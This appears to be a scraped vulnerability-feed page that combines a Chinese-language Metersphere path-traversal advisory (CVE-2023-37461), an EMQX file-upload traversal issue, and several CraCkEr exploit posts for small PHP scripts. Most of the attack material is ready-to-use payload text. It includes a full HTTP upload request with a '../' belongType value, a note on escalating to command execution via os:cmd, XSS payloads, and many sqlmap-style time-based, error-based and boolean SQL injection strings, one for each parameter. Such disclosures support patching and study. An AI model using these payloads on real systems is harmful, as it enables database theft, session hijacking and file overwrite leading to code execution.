Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a `belongType` value with a relative path like `../../../../` which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Summary**

metersphere 由于只检查了文件名，忘记检查文件类型，导致路径穿越。

**POC**

POC: https://1drv.ms/v/s!Avwg5C1eKVA4gl3LF2hgRyVNrSqk?e=DHbHKF

1、找到测试用例中的上传附件的按钮  
2、上传一个附件  
3、拦截请求，

POST /track/attachment/testcase/upload HTTP/1.1  
Host: 192.168.213.128:8081  
Content-Length: 381  
Accept-Language: zh-CN  
WORKSPACE: ed18cee8-2004-4bf1-b112-0070bc03b270  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Accept: application/json, text/plain, _/_  
CSRF-TOKEN: PpGjvIYb9h+d3ui4XudsF0lKJ9oUMhPVBGIkOzibaLIfhzPrKVb0YQLLHByaPGP8pZeHZ1VwtciGzO528axH8g==  
X-AUTH-TOKEN: a84e0cf1-05a7-4627-8129-0bc264dc694d  
PROJECT: a815f3f2-57be-47f4-8351-56a5c643c0de  
Origin: http://192.168.213.128:8081  
Referer: http://192.168.213.128:8081/  
Accept-Encoding: gzip, deflate  
Cookie: \_\_stripe\_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step\_dashboard=true; step\_client\_index=true; privacy-options=6/12/2023|technical|statistical|external  
Connection: close

\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="file"; filename="tmp2hyh.txt"  
Content-Type: text/plain

tmp2  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="request"; filename="blob"  
Content-Type: application/json

{"belongId":"","belongType":"../../../../../../"}  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7--

4、我们发现修改belongType为../../../../../../就可以达到路径穿越的目的

5 我们看了一下代码，如下，uploadAttachment 检查了BelongType是否等于ISSUE以及TEST\_CASE。如果都不是，就直接在函数saveAttachment中使用BelongType作为文件名的一部分，导致路径穿越。  

**Impact**

任意文件覆盖，甚至可以达到任意代码执行

CVE-2023-37461: metersphere 存在路径穿越漏洞

An issue in the emqx_sn plugin of EMQX v4.3.8 allows attackers to execute a directory traversal via uploading a crafted .txt file.

**What happened?**

Path travelsal is existing in HTTP api POST http://xxx.xxx.xxx.xxx:xxx/api/v4/data/file/  
if the filename parameter is ../../../test, the attacker could write malicious file anywhere, to investigate it deeply, if the plugin schema file was replaced, while "os:cmd("echo 12345678 > hacked.txt")" can be added, then attacker can execute malicious command by click the plugin load button or trigger related http api.

Of course attacker should login to the dashboard first. It could be came true if someone use a weak password or old version default password is used.

**What did you expect to happen?**

fix the path travelsal issue

**How can we reproduce it (as minimally and precisely as possible)?**

_No response_

**Anything else we need to know?**

_No response_

**EMQX version**

$ ./bin/emqx\_ctl broker
ALL VERSION!!!

**OS version**

\# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here

**Log files**

CVE-2023-37781: a security issue was found · Issue #10419 · emqx/emqx

Travelable version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Travelable 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: travelmate.com# Vendor Homepage: https://www.codester.com/items/43963/travelable-trek-management-solution# Software Link: https://travel.codeswithbipin.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /[random-number]/commentPOST parameter 'comment' is vulnerable to XSS-----------------------------------------------------------POST /[random-number]/comment HTTP/2_token=10Mh1zuuVXB1iH3QsrEOqpWGOXogEv38WPwqGtv6&name=cracker+infosec&email=cracker%40infosec.com&phone=%2B96171951951&comment=[XSS Payload]-----------------------------------------------------------## Steps to Reproduce:1. Surf as a (Guest User)2. Go to [Tour Packages] on this Path: https://website/packages3. Choose any package and click [Explore] Path: https://website/package/64. Scroll Down to the [Comments] section5. Inject your XSS Payload in [Comment Box]6. Click on [Submit]7. Every visitor to the page where you inject your [XSS Payload] - Path: https://website/package/68. XSS will fire and execute on his browser.[-] Done

Travelable 1.0 Cross Site Scripting

BloodBank version 1.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: BloodBank 1.1 - SQL Injection# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /bloodbank/searchPOST parameter 'country' is vulnerable to SQL InjectionPOST parameter 'city' is vulnerable to SQL InjectionPOST parameter 'blood_group_id' is vulnerable to SQL Injection-----------------------------------------------------------POST /bloodbank/search HTTP/2country=[SQLI]&city=[SQLI]&blood_group_id=[SQLI]&form_search=Search+Donor--------------------------------------------------------------Parameter: country (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&city=123&blood_group_id=2&form_search=Search+DonorParameter: city (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123&city=123'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&blood_group_id=2&form_search=Search+DonorParameter: blood_group_id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123&city=123&blood_group_id=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&form_search=Search+Donor---[-] Done

BloodBank 1.1 SQL Injection

BloodBank version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: BloodBank 1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /bloodbank/page.phpURL parameter is vulnerable to RXSShttps://website/bloodbank/page.php/jr88z"><script>alert(1)</script>h6n9w?slug=blog&page=2[-] Done

BloodBank 1.1 Cross Site Scripting

Carlisting version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Carlisting 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /carlisting/search.phpGET parameter 'country' is vulnerable to RXSSGET parameter 'state' is vulnerable to RXSSGET parameter 'city' is vulnerable to RXSShttps://website/carlisting/search.php?brand_id=1&model_id=1&car_condition=New%20Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=[XSS]&state=[XSS]&city=[XSS][-] Done

Carlisting 1.6 Cross Site Scripting

Carlisting version 1.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Carlisting 1.6 - SQL Injection# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /carlisting/search.phpGET parameter 'brand_id' is vulnerable to SQL InjectionGET parameter 'model_id' is vulnerable to SQL InjectionGET parameter 'car_condition' is vulnerable to SQL InjectionGET parameter 'car_category_id' is vulnerable to SQL InjectionGET parameter 'body_type_id' is vulnerable to SQL InjectionGET parameter 'fuel_type_id' is vulnerable to SQL InjectionGET parameter 'transmission_type_id' is vulnerable to SQL InjectionGET parameter 'year' is vulnerable to SQL InjectionGET parameter 'mileage_start' is vulnerable to SQL InjectionGET parameter 'mileage_end' is vulnerable to SQL InjectionGET parameter 'country' is vulnerable to SQL InjectionGET parameter 'state' is vulnerable to SQL InjectionGET parameter 'city' is vulnerable to SQL Injectionhttps://website/carlisting/search.php?brand_id=[SQLI]&model_id=[SQLI]&car_condition=[SQLI]&price_range=1&car_category_id=[SQLI]&body_type_id=[SQLI]&fuel_type_id=[SQLI]&transmission_type_id=[SQLI]&year=[SQLI]&mileage_start=[SQLI]&mileage_end=[SQLI]&country=[SQLI]&state=[SQLI]&city=[SQLI]---Parameter: brand_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: model_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_condition (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_category_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: body_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: fuel_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: transmission_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: year (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_start (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_end (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&country=USA&state=CA&city=LosParameter: country (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&state=CA&city=LosParameter: state (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&city=LosParameter: city (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW---[-] Done

Carlisting 1.6 SQL Injection

RecipePoint version 1.9 suffers from a remote SQL injection vulnerability.

# Exploit Title: RecipePoint 1.9 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 15/07/2023  
# Vendor: phpscriptpoint  
# Vendor Homepage: https://phpscriptpoint.com/  
# Software Link: https://demo.phpscriptpoint.com/recipepoint/  
# Tested on: Windows 10 Pro  
# Impact: Database Access

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

Path: /recipepoint/recipe-result

GET parameter 'text' is vulnerable to SQL Injection  
GET parameter 'category' is vulnerable to SQL Injection  
GET parameter 'type' is vulnerable to SQL Injection  
GET parameter 'difficulty' is vulnerable to SQL Injection  
GET parameter 'cuisine' is vulnerable to SQL Injection  
GET parameter 'cooking_method' is vulnerable to SQL Injection

https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]

---  
Parameter: text (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

    Type: boolean-based blind  
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
    Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: category (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: type (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: difficulty (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1

Parameter: cuisine (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1

Parameter: cooking_method (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)  
---

[-] Done

RecipePoint 1.9 SQL Injection

Lawyer CMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Lawyer CMS 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/lawyer/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /lawyer/page.phpURL parameter is vulnerable to RXSShttps://website/lawyer/page.php/[XSS]?slug=blog&page=2Path: /lawyer/search.phpURL parameter is vulnerable to RXSShttps://website/lawyer/search.php/[XSS]?search_string=&page=2[-] Done

Lawyer CMS 1.6 Cross Site Scripting

JobSeeker version 1.5 suffers from a cross site scripting vulnerability.

    # Exploit Title: JobSeeker 1.5 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/jobseeker/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /jobseeker/search-result.phpGET parameter 'kw' is vulnerable to RXSSGET parameter 'lc' is vulnerable to RXSSGET parameter 'ct' is vulnerable to RXSSGET parameter 'cp' is vulnerable to RXSSGET parameter 'p' is vulnerable to RXSShttps://website/jobseeker/search-result.php?kw=[XSS]&lc=[XSS]&ct=[XSS]&cp=[XSS]&p=[XSS][-] Done

Tag

#windows